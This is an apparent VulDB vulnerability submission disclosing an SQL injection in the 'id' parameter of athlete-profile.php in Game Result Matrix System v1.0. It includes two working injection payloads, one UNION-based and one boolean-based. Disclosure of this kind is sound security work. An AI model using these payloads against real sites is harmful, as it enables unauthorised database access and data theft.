| Title | Game Result Matrix System v1.0 /dipam/athlete-profile.php GET parameter id exists SQL injection vulnerability |
|---|
| Description | Game Result Matrix System v1.0 has SQL injection vulnerability.
Vulnerability File: /dipam/athlete-profile.php
GET parameter id exists SQL injection vulnerability.
Payload1: id=-1' union all select null,null,null,null,null,null,null,null,null,concat(0x56575859,0x60616263),null,null,null-- -
UNION query successful.
Payload2: id=243' AND 123=123 AND 'qwe'='qwe
The Boolean value is judged correctly, so the page is displayed normally. |
|---|
| Source | ⚠️ https://github.com/M9KJ-TEAM/CVEReport/blob/main/SQL2.md |
|---|
| User | zhangyf (UID 48462) |
|---|
| Submission | 06/21/2023 12:17 (3 years ago) |
|---|
| Moderation | 06/23/2023 11:19 (2 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 232239 [SourceCodester Game Result Matrix System 1.0 GET Parameter athlete-profile.php ID sql injection] |
|---|
| Points | 20 |
|---|